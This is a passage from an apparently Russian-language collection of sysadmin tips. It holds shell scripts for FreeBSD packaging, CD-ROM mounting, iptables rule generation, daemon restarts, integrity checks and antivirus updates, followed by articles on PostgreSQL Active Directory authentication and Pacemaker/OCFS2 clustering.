"***** run4 STOP ***** " >> /var/log/rpm_update4 вызывается по крону, если на сервере появились свежие пакеты, быстренько заливает их в локальный репозитарий.

Скрипт для автоматизации создания бинарных пакетов для FreeBSD Автор: Alexey Tsvetnov [комментарии]

#!/bin/sh # # Create all packages with sym-links for FreeBSD 5.x+ # # Version: 1.2.2 # Copyright (c) 2006 Alexey Tsvetnov, vorakl@fbsd.kiev.ua # # All error in /var/log/<script_name>.err # # Path to packages directory packagespath="/usr/ports/packages" # Command for get package's version pkgvercmd="/usr/sbin/pkg_version -v" #pkgvercmd="/usr/local/sbin/portversion -v" # more faster than pkg_version #------------------------------------------------------------------------------- err="\033[0;40;31mError\033[0m" ok="\033[1;40;33mOk\033[0m" checkPackagesPath () { [ -d $packagespath ] || { /usr/bin/printf " *** $err: $packagespath doesn't exist.\n"; /bin/echo " *** Error: $packagespath doesn't exist." > /var/log/`basename $0`.log; exit 1; } [ -d $packagespath/All ] || { /bin/mkdir $packagespath/All || exit 1; } [ -d $packagespath/Latest ] || { /bin/mkdir $packagespath/Latest || exit 1; } return 0 } checkPkgAll () { [ -f $packagespath/All/$fullname.tbz ] && return 0 return 1 } checkPkgLatest () { [ -L $packagespath/Latest/$shortname.tbz ] && [ -r $packagespath/Latest/$shortname.tbz ] && return 0 return 1 } checkPkgCat () { [ -L $packagespath/$subdir/$fullname.tbz ] && [ -r $packagespath/$subdir/$fullname.tbz ] && return 0 return 1 } createPkgAll () { /usr/sbin/pkg_create -jb $fullname $packagespath/All/$fullname.tbz && return 0 return 1 } createPkgLatest () { /bin/rm -f $packagespath/Latest/$shortname.tbz cd $packagespath/Latest && /bin/ln -s ../All/$fullname.tbz $shortname.tbz && return 0 return 1 } createPkgCat () { if [ -d $packagespath/$subdir ]; then /bin/rm -f $packagespath/$subdir/$fullname.tbz else /bin/mkdir -p $packagespath/$subdir fi cd $packagespath/$subdir && /bin/ln -s ../All/$fullname.tbz $fullname.tbz && return 0 return 1 } getPkgFullVersion () { echo -n "Geting full version package list..." pkglist=`$pkgvercmd | /usr/bin/awk '{print $1}'` /usr/bin/printf "$ok\n" } work () { for fullname in $pkglist; do /bin/echo "Check $fullname" shortname=`/bin/echo $fullname | /usr/bin/sed 's/\-[^-]*$//'` subdir=`/usr/sbin/pkg_info -o $fullname | /usr/bin/sed -e '1,3d' -e '$d' | /usr/bin/awk -F/ '{print $1}'` if ! checkPkgAll; then /bin/echo -n " ==> Create package..." if createPkgAll; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi /bin/echo -n " ==> Create Latest sym-link..." if createPkgLatest; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi /bin/echo -n " ==> Create Category sym-link..." if createPkgCat; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi continue fi if ! checkPkgLatest; then /bin/echo -n " ==> Create Latest sym-link..." if createPkgLatest; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi fi if ! checkPkgCat; then /bin/echo -n " ==> Create Category sym-link..." if createPkgCat; then /usr/bin/printf "$ok\n" else /usr/bin/printf "$err\n" fi fi done } main () { exec 2>/var/log/`basename $0`.log checkPackagesPath getPkgFullVersion work exec 2>&- } main exit 0

Скрипт для упрощения монтирования CD-ROMа Автор: Антон [комментарии]

Вот такой простой скрипт: #!/bin/sh retval=`/sbin/mount | grep /mnt/cdrom` if [ -n "$retval" ]; then /sbin/umount /mnt/cdrom 1> /dev/null 2> /dev/null if [ "$?" -ne 0 ]; then echo "Не могу размонтировать CDROM" else echo "Размонтировал CDROM" eject /dev/cdrom fi else /sbin/mount /dev/cdrom 1> /dev/null 2> /dev/null if [ "$?" -ne 0 ]; then echo "Не могу смонтировать CDROM" else echo "Примонтировал CDROM" fi fi П.С. копируем в каталог /sbin под именем cdm. Сам определяет состояние

Как прикрепить 48x48 иконку к письму (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Содержимое черно-белой 48x48 иконки передается через заголовк X-Face, цветной - Face (PNG картинка, размером после base64 кодирования не больше 998 байт, разбивка по 79 символов в строке). Скрипт для преобразования Jpeg в "Face:" #!/bin/bash jpg=$1 png=$2 if [ "$jpg" = "" -o "$png" = "" ]; then echo "Usage: make-face <JPG-FILE> <BASE64-FILE>" exit fi quant=16 found=false tmp=/tmp/make-face.$$.tmp while [ "$found" = "false" ]; do echo -n "Trying quantization $quant ($jpg)..." djpeg "$jpg"\ | ppmnorm\ | pnmscale -width 48 -height 48\ | ppmquant $quant\ | pnmtopng\ | mimencode > $tmp size=`ls -l $tmp | awk '{ print $5; }'` if [ $size -lt 993 ]; then echo -n "Face:" > "$png" for i in `cat $tmp`; do echo -n " " >> "$png" echo "$i" >> "$png" done rm $tmp found=true echo "done" else quant=`expr $quant - 2` echo "too big ($size)" fi done

Скрипт для автоматизации настройки iptables фильтра для локальной сети (доп. ссылка 1) Автор: Константин Брызгалов [комментарии]

На разных машинах в моей локальной сети накопилась куча программ, которым нужен был выход в интернет напрямую. У каждой свой набор портов. Захотелось на входе иметь минимальную конфигурацию, описывающую ресурсы, а на выходе набор разрешающих правил для iptables. В основном были клиент-банки - поэтому и такая терминология в программе. А так вместо банка можно указывать любой ресурс в формате определенном в man iptables. Ограничения, недостатки: 1. использование количества портов для одного ресурса менее 16 2. нельзя указать диапазон портов через двоеточие как в iptables Оба легко устаняются: первое - есть пример в самом скрипте, второе через использование другого разделителя для записей на входе, проверку наличия ":" - использование другого формата вызова iptables. Мне это не нужно и код не хотел раздувать. #!/bin/bash #bkv 2005.10 #Дано: # Два списка: # Первый список из записей вида - банк:порты(через запятую) # Второй список из записей вида - клиент:банки(через запятую) #Найти: # Набор разрешающих правил iptables для forward #Примечания: # политика FORWARD по умолчанию - "запрещено все, что не разрешенно" # iptables поддерживает одновременное указание не более 15 портов #Решение: # Создадим отдельную цепочку, например, - CLIENTBANK # Сгенерируем необходимые правила и поместим их в цепочку CLIENTBANK # Обращения по всем портам из первого списка направим на обработку в CLIENTBANK # Перед выполнением все правила связаные с цепочкой CLIENTBANK удалим, чтобы не плодить # правила от многократного запуска itls="/sbin/iptables" #Подаем список на обработку awk #признак первого списка - первое поле BankPorts #признак второго списка - первое поле ClientBanks echo -e "\ BankPorts:smtp.mail.ru:25\n\ BankPorts:10.24.70.0/26:22,23\n\ BankPorts:pop.mail.ru:110\n\ BankPorts:bank4.ru:9999,888\n\ BankPorts:bank5.ru:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\n\ BankPorts:bank6.ru:21,22,23,24,25,26,27,28,29,210,211,212,213,214,215\n\ ClientBanks:192.168.9.0/16:smtp.mail.ru,pop.mail.ru,10.24.70.0/26\n\ ClientBanks:192.168.9.8:bank4.ru,bank5.ru,bank6.ru\n\ ClientBanks:192.168.9.6:bank6.ru,bank4.ru\n\ "|\ awk -v itls=$itls -F: '{ if($0~/^BankPorts/) BankPorts[$2]=$3 #создаем ассоциативный массив - индекс:банк, значение:порты через запятую if($0~/^ClientBanks/) ClientBanks[$2]=$3 #аналогично клиент -> банки }END{ #Cгенерируем _необходимые_ правила для цепочки CLIENTBANK for (client in ClientBanks){ split(ClientBanks[client],bank_arr,",") #поместили в массив bank_arr адреса банков для клиента for(i in bank_arr){ all_ports=all_ports","BankPorts[bank_arr[i]] #создаем список всех портов для дальнейшего использования count_ports=split(BankPorts[bank_arr[i]],tmp_arr,",") if(count_ports > 15) print "echo Слишком много портов для "bank_arr[i]".Допиши программу.Выход&&exit 1" else printf("%s -A CLIENTBANK -s %s -d %s -p tcp -m multiport --dports %s -j ACCEPT\n",itls,client,bank_arr[i],BankPorts[bank_arr[i]]) } } #Создадим правила перенаправляющие из FORWARD на обработку в CLIENTBANK, помня про ограничение в 15 портов sub(",","",all_ports) #отрезаем первую запятую у списка всех использующихся портов split(all_ports,all_ports_arr,",")#поместили в массив all_ports_arr все порты какие есть j=1;i=1 while(all_ports_arr[i]){ while(i<=(j*15)){ if (all_ports_arr[i]) tmp_all_ports=tmp_all_ports","all_ports_arr[i] i++ } sub(",","",tmp_all_ports) #отрезаем первую запятую printf("%s -I FORWARD -p tcp -m multiport --ports %s -j CLIENTBANK\n",itls,tmp_all_ports) tmp_all_ports="" j++ } print itls" -A CLIENTBANK -p tcp -m state --state ESTABLISHED -j ACCEPT" print itls" -N CLIENTBANK" print itls" -X CLIENTBANK" print itls" -F CLIENTBANK" #Удаляем из FORWARD все цепочки содержащие цель CLIENTBANK del_rules_nums="'`$itls --line-numbers -L FORWARD -n|grep CLIENTBANK|cut -f1 -d" "|tr "\n" ","`'" split(del_rules_nums,del_rules_arr,",") cnt_rules=1 while(del_rules_arr[cnt_rules]){ printf("%s -D FORWARD %s\n",itls,del_rules_arr[cnt_rules]) cnt_rules++ } }'|tac > gen.itls.sh chmod 700 gen.itls.sh echo "Команды сгенерированы в файл ./gen.itls.sh .Выход." exit ./gen.itls.sh rm ./gen.itls.sh

Скрипт для восстановления процессов на случай сбоя Автор: Yurik [комментарии]

Иногда случается, что при сбое (например при большой нагрузке или при временном отсутствии каналов связи) важные демоны самостоятельно завершают свою работу. Например может случаться вот такая ошибка squid[703]: Exiting due to repeated, frequent failures Такое же может иногда случаться с IPA (/usr/ports/sysutils/ipa) и Apache. Чтобы автоматизировать отслеживание таких процессов можно создать `crontab -e` задание (на примере Squid) 5,35 * * * * /usr/local/etc/rc.d/checksquid ./checksquid: proc="squid" PIDFILE=/var/run/${proc}.pid if [ -f $PIDFILE ] ; then PID=`head $PIDFILE` if [ "x$PID" != "x" ] && kill -0 $PID 2>/dev/null ; then RUNNING=1 else RUNNING=0 fi else RUNNING=0 fi if [ $RUNNING -eq 0 ]; then echo "Starting $proc again..." /usr/local/etc/rc.d/${proc}.sh start continue else echo "$proc already running" fi Нужно только убедиться что нужные PID файлы хранятся в /var/run. Директивы pid_filename в squid.conf, PidFile в httpd.conf

Контроль целостности системы штатными средствами Автор: Avatar [комментарии]

Что делать если под рукой нет tripwire или osec, а кривой aide вы пользоваться не хотите. Часть функций , таких как проверка прав доступа и изменение файлов, можно реализовать штатными стедствами. Вот маленький скрипт который помещается в crontab и позволяет это реализовать. При желании его функции можно легко расширить. #!/bin/bash ulimit -t 20 checkdir="/bin /sbin" filedb="/var/tmp/permsecdb" email="test@test.ru" out=$( exec 2>&1 umask 266 find $checkdir -type f -printf "%m\t" -exec md5sum {} \; >$filedb.tmp diff $filedb $filedb.tmp mv -f $filedb.tmp $filedb ) if [ "$out" ];then (date; echo; echo "$out") |mail -s "Change permsec `hostname`" $email fi - ulimit лучше выставить не случай не предвиденных ситуаций. - checkdir соответственно проверяемые директории - filedb текстовой файл базы - email куда посылать мыло Если изменений в системе не было, то сообщения посылаться не будут. Сообщение бывает 4 видов 1 - ошибки 2 - добавлен файл "> 644 d41d8cd98f00b204e9800998ecf8427e /bin/12" 3 - удален файл "< 755 c1a0ff878c603dd91f603059e9c1a0a1 /bin/12" 4 - изменен файл " < 755 ce367ef1e2cca19e6216874cb8c09d96 /bin/12 --- > 755 c1a0ff878c603dd91f603059e9c1a0a1 /bin/12" Успешного контроля.

Скрипт для сканирования лога dmesg Автор: Андрей [обсудить]

Вот возникла необходимость в постоянном сканировании лога dmesg и выполнении определенных действий. Возможно общественности пригодится. #!/bin/bash # # simple scan dmesg # # event files: # DEBUG=0 # STRING="scaning dmesg string" # EXEC="command" # EVENTDIR=/etc/scan-dmesg sleep 2 if [ ! -e "$1" ]; then TMPFILE=`mktemp` dmesg > $TMPFILE $0 $TMPFILE & exit 0 fi if [ "`dmesg | diff $1 -`" ] ; then TMPFILE=`mktemp` dmesg > $TMPFILE for FILE in $EVENTDIR/* ; do . $FILE if diff $1 $TMPFILE | grep -q "$STRING" ; then $EXEC > /dev/null 2>&1 if [ $DEBUG ] ; then echo "`date` $0: for event $FILE exec $EXEC" >> /var/log/scan-dmesg fi fi done rm -rf $1 $0 $TMPFILE & exit 0 fi $0 $1 & exit 0

Обновление антивирусных баз (AvpUpdate) (доп. ссылка 1) Автор: denz [обсудить]

Автоматическое обновление антивирусных баз, пример скрипта: #!/bin/sh AVPUServ="ftp://downloads-us1.kaspersky-labs.com" FTPDir="/home/virtual/ftp/pub" cd /home/virtual/ftp/pub/AVP echo "==> Процесс обновления антивирусных баз и утилит запущен..." wget -m -c -o /var/log/avp-update.log -nH ${AVPUServ}/updates/ echo "==> Обновление антивирусных баз завершено..." wget -m -c -o /var/log/avp-update_zip.log -nH ${AVPUServ}/updates_zip/ echo "==> Обновление антивирусных баз в формате zip завершено..." wget -m -c -o /var/log/avp-utils.log -nH ${AVPUServ}/utils/ echo "==> Обновление антивирусных утилит завершено..." chown -R denz:operator ${FTPDir}/* echo "==> Дата обновления:" `date` В крон вбиваем: 30 3 * * * root /bin/sh /usr/bin/avpupdate По первому разу качнет порядка 10 метров, все последующие только обновившиеся и новые файлы... Работает в бакграунде.

SQL и базы данных

MySQL специфика

Оптимизация и администрирование MySQL

PostgreSQL специфика

PlPerl и PlSQL

Оптимизация и администрирование PostgreSQL

Настройка СУБД Postgresql для аутентификации пользователей через Active Directory Автор: Slonik [комментарии]

В статье расскажу про мой опыт настройки СУБД Postgresql для включения аутентификации пользователей через Active Directory с помощью протокола GSSAPI. Предполагается, что домен Active Directory и БД Postgresql уже развёрнуты. Для примера у меня развёрнут тестовый стенд со следующими параметрами:
Сервер с Active Directory: Windows Server 2022
Функциональный уровень домена: Windows Server 2016
Имя домена: domain.test
Контроллер домена: dc.domain.test
Клиентский компьютер с Windows 11, присоединённый к домену
Сервер с БД Postgresql 13 на Debian 11
DNS имя сервера СУБД: pg-host.domain.test Установка пакетов на сервере СУБД Для систем на базе Debian: root# apt install krb5-user postgresql Настройка Kerberos на сервере СУБД В файле /etc/krb5.conf на сервере с СУБД Postgresql добавляем описание для области Kerberos домена Windows: [libdefaults] default_realm = DOMAIN.TEST ... [realms] DOMAIN.TEST = { kdc = dc.domain.test admin_server = dc.domain.test } Проверяем, что можем получить билет: user@pg-host:~$ kinit Administrator@DOMAIN.TEST Смотрим список полученных билетов на сервере с БД: user@pg-host:~$ klist Ticket cache: FILE:/tmp/krb5cc_0 Default principal: Administrator@DOMAIN.TEST Valid starting Expires Service principal 23.07.2022 20:55:44 24.07.2022 06:55:44 krbtgt/DOMAIN.TEST@DOMAIN.TEST renew until 24.07.2022 20:55:38 Настройка описания имени службы в Active Directory Настройка пользователя Active Directory Для того, чтобы пользователи могли подключаться к СУБД с помощью GSSAPI, в Active Directory должна быть учётная запись с соответствующей записью уникального описания службы в поле Service Principal Name и User Principal Name: servicename/hostname@REALM. Значение имени сервиса servicename по умолчанию postgres и может быть изменено во время сборки Postgresql с помощью параметра with-krb-srvnam ./configure --with-krb-srvnam=whatever
hostname - это полное доменное имя сервера, где работает СУБД (pg-host.domain.test) оно должно быть зарегистрировано в DNS сервере, который использует Active Directory.
realm - имя домена (DOMAIN.TEST) В моём примере имя службы получается: postgres/pg-host.domain.test@DOMAIN.TEST Создаём пользователя pg-user в Active Directory, указываем "Запретить смену пароля пользователей" и "Срок действия пароля не ограничен". Создание файла с таблицами ключей Для того, чтобы служба СУБД могла подключаться к Active Directory без ввода пароля, необходимо создать файл keytab на сервере с Windows Server и после переместить его на сервер c СУБД. Создание файла выполняется с помощью команды ktpass.exe: ktpass.exe -princ postgres/pg-host.domain.test@DOMAIN.TEST -ptype KRB5_NT_PRINCIPAL -crypto ALL -mapuser pg-user@domain.test -pass <пароль> -out %tmp%\krb5.keytab Эта же команда выполняет привязку имени сервиса к учётной записи. Подключаемся к СУБД Postgresql и определяем, где СУБД предполагает наличие файла keytab: postgres@pg-host:~$ psql postgres=# show krb_server_keyfile; FILE:/etc/postgresql-common/krb5.keytab Копируем файл с Windows Server на сервер с СУБД в указанное место. Если файл необходимо расположить в другом месте, то необходимо поменять параметр krb_server_keyfile: sql> alter system set krb_server_keyfile=''/path''; Настройка Postgresql Настройка файла доступа pg_hba.conf и файла сопоставления имён pg_ident.conf В файле pg_ident.conf описываем сопоставление пользователей Active Directory с пользователями БД: # MAPNAME SYSTEM-USERNAME PG-USERNAME gssmap /^(.*)@DOMAIN\.TEST$ \1 Данное сопоставление указывает отображать доменного пользователя user@DOMAIN.TEST в пользователя БД user (для подключения, пользователь user уже должен быть создан в БД). В файле pg_hba.conf указываем, например, что использовать аутентификацию с помощью GSSAPI необходимо только для пользователей, состоящих в группе krb_users и подключающихся из сети 192.168.1.0/24: host all +krb_users 192.168.1.0/24 gss include_realm=1 krb_realm=DOMAIN.TEST map=gssmap Здесь:
map=gssmap - имя сопоставления из файла pg_ident.conf
krb_realm - имя домена Active Directory Создание пользователей Создаём пользователей в Active Directory: user1, user2. Создаём пользователей в СУБД: postgres=# create role user1 login; postgres=# create role user2 login; postgres=# create role user3 login encrypted password ''пароль'' ; Создаём группу krb_users (как файле pg_hba.conf) и добавляем необходимых пользователей в неё: postgres=# grant krb_users to user1; postgres=# grant krb_users to user2; В данном случае, пользователи user1, user2 смогут подключится к СУБД через GSSAPI, используя учётные данные из Active Directory, а пользователь user3 сможет подключиться только с указанием пароля, хранящимся в БД. Проверка подключения На Windows машине проверяем подключение. Входим на компьютер с Windows через Active Directory, например, как user1@domain.test. Запускаем клиент postgresql, в строке подключения указываем полное доменное имя сервера СУБД, как прописано в файле keytab - pg-host.domain.test, логин и пароль не указываем: C:\> chcp 1251 C:\> psql -h pg-host.domain.test -d postgresql Смотрим список билетов Kerberos: C:\> klist.exe #2> Клиент: user1 @ DOMAIN.TEST Сервер: postgres/pg-host.domain.test @ DOMAIN.TEST Тип шифрования KerbTicket: RSADSI RC4-HMAC(NT) флаги билета 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Время начала: 7/24/2022 11:22:54 (локально) Время окончания: 7/24/2022 20:59:53 (локально) Время продления: 7/24/2022 10:59:53 (локально) Тип ключа сеанса: RSADSI RC4-HMAC(NT) Флаги кэша: 0 Вызванный центр распространения ключей: dc.domain.test Проверяем подключение пользователя user3 с помощью пароля: C:\> psql -h pg-host.domain.test -d postgresql -U user3 Как видно аутентификация в СУБД работает успешно как с помощью Active Directory, так и через пароль, хранящийся в БД.

Настройка СУБД PostgreSQL 13 под управлением Pacemaker/Corosync в Debian 11 Автор: Slonik [комментарии]

В статье расскажу про мой опыт настройки Postgresql для работы под контролем кластерной службы Pacemaker Под нагрузкой данное решение не проверялось, всегда делайте (и проверяйте) резервные копии. Для хранения базы данных будет рассмотрен пример использования кластерной файловой системе OCFS2. Версии ПО, использованные в примере:
OCFS2 - драйвер из ядра 5.10, утилиты ocfs2-tools - 1.8.6
Corosync - 3.1.2
Pacemaker - 2.0.5
Postgresql 13 В статье будет три типа кластеров:
кластер файловой системы OCFS2 - обеспечивает хранение файлов на общем диске и согласованную работу с ними
кластер Corosync/Pacemaker - обеспечивает отслеживание работы процессов СУБД, запуск виртуального ip-адреса СУБД
кластер баз данных Postgresql - набор баз, управляемых одним экземпляром работающего сервера СУБД Подготовка операционных систем Для устойчивой работы кластеров (OCFS2, Pacemaker/Corosync) необходимо как минимум три сервера. Сервера могут быть как физические так и виртуальные. Желательно, чтобы сервера имели одинаковые характеристики производительности. Я для демонстрации подготовил три виртуальные машины с помощью Qemu-KVM. Устанавливаем ОС Debian 11 на каждый из серверов в минимальной конфигурации. Настройка сети В примере у меня будут сервера с адресами:
node1 - ip 192.168.1.11
node2 - ip 192.168.1.12
node3 - ip 192.168.1.13 Имена узлов должны разрешаться в IP-адреса на каждом из серверов, для этого необходимо прописать сопоставление в файле /etc/hosts или создать записи на DNS-сервере. root:~# cat /etc/hosts 127.0.0.1 localhost 192.168.1.11 node1.local node1 192.168.1.12 node2.local node2 192.168.1.13 node3.local node3 В случае реальной реализации кластера, сетевых карт на каждом из серверов должно быть как минимум две - карты необходимо объединить в логическое устройство bonding или teaming. Физически карты должны подключаться к двум независимым коммутаторам. В примере у меня будет по одной сетевой карте на сервер. Настройка сетевого экрана Выполняем настройку экрана на каждом узле:
устанавливаем пакет для управления брандмауэром ufw
создаём разрешающие правила для ssh, postgres, узлов кластера
активируем правила root# apt install ufw root# ufw allow ssh root# ufw allow postgres root# ufw allow from 192.168.1.11 to any root# ufw allow from 192.168.1.12 to any root# ufw allow from 192.168.1.13 to any root# ufw enable Кластер OCFS2 для отслеживания работы узлов по-умолчанию использует протокол TCP порт 7777 (задаётся в файле /etc/ocfs2/cluster.conf), а Corosync - протокол UDP, порт 5405 (задаётся в файле /etc/corosync/corosync.conf), с учётом этого, можно настроить более тонкие правила брандмауэра: root# ufw allow proto tcp from 192.168.1.11 to any port 7777 root# ufw allow proto tcp from 192.168.1.12 to any port 7777 root# ufw allow proto tcp from 192.168.1.13 to any port 7777 root# ufw allow proto udp from 192.168.1.11 to any port 5405 root# ufw allow proto udp from 192.168.1.12 to any port 5405 root# ufw allow proto udp from 192.168.1.13 to any port 5405 Настройка дисковой системы На каждом сервере будет индивидуальный диск для системы (/dev/vda, 20 Гб) и общий диск на все сервера для хранения БД (/dev/vdb, 5 Гб): root# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT vda 254:0 0 20G 0 disk ├─vda1 254:1 0 512M 0 part /boot/efi ├─vda2 254:2 0 18,5G 0 part / └─vda3 254:3 0 976M 0 part [SWAP] vdb 254:16 0 5G 0 disk /mnt/ocfs2clst Настройка кластерной файловой системы Для реального использования общий диск должен быть расположен на системе хранения данных, и подключатся к серверам по нескольким путям. Для демонстрации общий диск будет реализован с помощью средств Qemu-KVM. Настройка службы кластера ФС OCFS2 Настройка ядра Linux Необходимо изменить параметры ядра, чтобы сервер автоматически перезагружался при сбое кластерной ФС, для это нужно создать файл /etc/sysctl.d/10-ocfs2.conf kernel.panic_on_oops = 1 kernel.panic = 30 После применить параметры: root# systemctl restart systemd-sysctl Данные настройки указывают ядру Linux при возникновении сбоя (когда связь по сети пропала, но узел продолжает запись heartbeat сообщений на общий диск) автоматически перезагрузить узел через 30 секунд. Установка пакетов OCFS2 Устанавливаем пакеты на каждом из узлов root# apt install ocfs2-tools Настройка кластера ФС OCFS2 Все настройки кластера OCFS2 хранятся в файле /etc/ocfs2/cluster.conf. Нужно либо выполнить команды на каждом узле кластера, либо выполнить на одном узле и после скопировать файл /etc/ocfs2/cluster.conf на каждый узел, а после выполнить регистрацию и запуск. Создаём кластер (выполнить на каждом узле кластера) root# o2cb add-cluster ocfs2clst Добавляем узлы в кластер (выполнить на каждом узле кластера), имя узла должно совпадать с тем, что выдаёт команда hostname root# o2cb add-node --ip 192.168.1.11 --port 7777 --number 1 ocfs2clst node1 root# o2cb add-node --ip 192.168.1.12 --port 7777 --number 2 ocfs2clst node2 root# o2cb add-node --ip 192.168.1.13 --port 7777 --number 3 ocfs2clst node3 Регистрируем кластер (выполнить на каждом узле кластера) root# o2cb register-cluster ocfs2clst Включаем кластер (выполнить на каждом узле кластера) root# o2cb start-heartbeat ocfs2clst Выполняем настройку драйвера ФС (обязательно выполнить на каждом узле кластера) root# dpkg-reconfigure ocfs2-tools Запускать кластер OCFS2 (O2CB) во время загрузки компьютера?: Y Имя кластера, запускаемого во время загрузки компьютера: ocfs2clst Настройки драйвера хранятся в файле /etc/default/o2cb Содержимое файла: # O2CB_ENABLED: 'true' means to load the driver on boot. O2CB_ENABLED=true # O2CB_BOOTCLUSTER: If not empty, the name of a cluster to start. O2CB_BOOTCLUSTER=ocfs2clst # O2CB_HEARTBEAT_THRESHOLD: Iterations before a node is considered dead. O2CB_HEARTBEAT_THRESHOLD=31 # O2CB_IDLE_TIMEOUT_MS: Time in ms before a network connection is considered dead. O2CB_IDLE_TIMEOUT_MS=30000 # O2CB_KEEPALIVE_DELAY_MS: Max. time in ms before a keepalive packet is sent. O2CB_KEEPALIVE_DELAY_MS=2000 # O2CB_RECONNECT_DELAY_MS: Min. time in ms between connection attempts. O2CB_RECONNECT_DELAY_MS=2000 Создание ФС OCFS2 Можно создать разделы на кластерном томе и создавать ФС уже на разделе, но это добавит сложностей при расширении тома, так как придётся вручную править границы раздела с помощью parted/fdisk и после расширять ФС. Но у нас кластерный том планируется целиком отдать под работу СУБД Postgresql, поэтому ФС предлагаю создать сразу на всем томе (в примере это диск /dev/vdb). Выполняем форматирование общего тома на одном из узлов: root# mkfs.ocfs2 -L pg-data --cluster-name=ocfs2clst -N 5 -T datafiles --fs-feature-level=max-features --cluster-stack=o2cb /dev/vdb Описание параметров:
-L pg-data - метка ФС
--cluster-name=ocfs2clst - имя кластера OCFS2, который управляет ФС
-N 5 - максимальное количество узлов, которые могут работать одновременно с ФС, позже можно поменять с помощью tunefs.ocfs2, но рекомендуется создавать структуру заранее
-T datafiles - тип хранимых данных, может быть mail, datafiles, vmstore
--fs-feature-level=max-features - включаем все доступные возможности ФС, т.к. узлы у нас идентичные
--cluster-stack=o2cb - используем для управления ФС стандартный стек o2cb Проверяем, что метки новой ФС видны на всех узлах кластера: root# blkid /dev/vdb /dev/vdb: LABEL="pg-data" UUID="ce92b1e7-30cb-4883-9a92-57c986f76acd" BLOCK_SIZE="4096" TYPE="ocfs2" Вывод команды blkid на всех узлах кластера должен совпадать. Выполняем пробное монтирование Монтирование выполняется 20-30 секунд, так как требует согласования по сети. Выполняем команды на всех узлах кластера. root# mkdir /mnt/ocfs2clst root# mount /dev/disk/by-uuid/ce92b1e7-30cb-4883-9a92-57c986f76acd /mnt/ocfs2clst Команда mounted.ocfs2 показывает на каких узлах смонтирована ФС. root# mounted.ocfs2 -f Device Stack Cluster F Nodes /dev/vdb o2cb ocfs2clst node1, node2, node3 Создаём пробные файлы/папки в каталоге /mnt/ocfs2clst на одном из узлов и проверяем, что они видны на остальных узлах кластера OCFS2. Размонтируем ФС на каждом узле: root# umount /mnt/ocfs2clst Расширение ФС OCFS2 Если потребуется увеличить размер хранилища:
Увеличиваем размер тома на СХД
Пересканируем том на сервере или перезагружаем узлы кластера
Расширяем ФС root# tunefs.ocfs2 -S /dev/vdb Добавление узла в кластер OCFS2 Если потребуется добавить ещё узел (например, node4, с ip 192.168.1.14) в кластер OCFS2, то необходимо выполнить команду на каждом узле: root# o2cb_ctl -C -i -n node4 -t node -a number=4 -a ip_address=192.168.1.14 -a ip_port=7777 -a cluster=ocfs2clst Необходимо заметить, что для обеспечения кворума, количество узлов должно быть нечётным. Установка PostgreSQL Устанавливаем пакеты на все узлы кластера: root# apt install postgresql Отключаем службу на каждом узле кластера, т.к. запуском СУБД будет управлять Pacemaker root# systemctl disable postgresql Настройка Pacemaker/Corosync Установка пакетов root# apt install pacemaker corosync crmsh fence-agents Настройка Corosync Служба Corosync обеспечивает обмен сообщениями между узлами кластера, с помощью неё отслеживается, что узлы работают корректно. А уже на основании информации о том какие узлы доступны, служба Pacemaker принимает решение о запуске сервисов (запуск виртуальных ip-адресов, монтирование файловых систем, запуск процессов СУБД). Настройки Corosync хранятся в файле /etc/corosync/corosync.conf. Рабочий пример файла указан ниже: # Please read the corosync.conf.5 manual page totem { version: 2 cluster_name: pgclst crypto_cipher: aes256 crypto_hash: sha256 } logging { fileline: off to_stderr: yes to_logfile: yes logfile: /var/log/corosync/corosync.log to_syslog: yes debug: off logger_subsys { subsys: QUORUM debug: off } } quorum { provider: corosync_votequorum } nodelist { node { name: node1 nodeid: 1 ring0_addr: 192.168.1.11 } node { name: node2 nodeid: 2 ring0_addr: 192.168.1.12 } node { name: node3 nodeid: 3 ring0_addr: 192.168.1.13 } } Включение шифрования сообщений Corosync Для повышения безопасности можно включить шифрование служебных сообщений при обмене между узлами кластера. Для этого на одном из узлов необходимо выполнить команду: root# corosync-keygen Она создаст файл /etc/corosync/authkey, этот файл необходимо скопировать на другие узлы кластера. root@node1:~# scp /etc/corosync/authkey root@node2:/etc/corosync/authkey root@node1:~# scp /etc/corosync/authkey root@node3:/etc/corosync/authkey В файле настроек /etc/corosync/corosync.conf необходимо задать параметры crypto_cipher и crypto_hash в секции totem: totem { ... crypto_cipher: aes256 crypto_hash: sha256 ... } Если вам необходимо разместить файл-ключ по не стандартному пути, то расположение можно указать с помощью директивы keyfile. После изменений необходимо перезапустить службы на каждом узле: root# systemctl restart corosync pacemaker Параметры узлов кластера Corosync Для работы кластера необходимо указать список узлов. Это делается в секции nodelist. nodelist { node { name: node1 nodeid: 1 ring0_addr: 192.168.1.11 } node { name: node2 nodeid: 2 ring0_addr: 192.168.1.12 } node { name: node3 nodeid: 3 ring0_addr: 192.168.1.13 } } После настройки, копируем файл /etc/corosync/corosync.conf на остальные узлы. Перезагружаем все узлы кластера и проверяем работу службы corosync с помощью команд corosync-quorumtool и crm_mon root@node1:~# corosync-quorumtool -s Quorum information ------------------ Date: Thu Jul 14 21:09:17 2022 Quorum provider: corosync_votequorum Nodes: 3 Node ID: 1 Ring ID: 1.139 Quorate: Yes Votequorum information ---------------------- Expected votes: 3 Highest expected: 3 Total votes: 3 Quorum: 2 Flags: Quorate Membership information ---------------------- Nodeid Votes Name 1 1 node1 (local) 2 1 node2 3 1 node3 root@node1:~# crm_mon -1 Cluster Summary: * Stack: corosync * Current DC: node3 (version 2.0.5-ba59be7122) - partition with quorum * Last updated: Thu Jul 14 21:11:18 2022 * Last change: Thu Jul 14 20:24:25 2022 by root via cibadmin on node1 * 3 nodes configured * 0 resource instances configured Node List: * Online: [ node1 node2 node3 ] Настройка Pacemaker Ресурсы Pacemaker описываются через XML-файлы, я вместо ручного написания xml-объектов буду использовать crm (CRM shell), где параметры ресурсов можно задать в виде аргументов. Смена имени кластера Ранее мы создали кластер OCFS2 с именем ocfs2clst, кластер Corosync с именем pgclst, теперь укажем имя кластера Pacemaker. После установки, имя кластера Pacemaker, обычно debian, поменяем его также на pgclst: root# crm_attribute --query --name=cluster-name scope=crm_config name=cluster-name value=debian root# 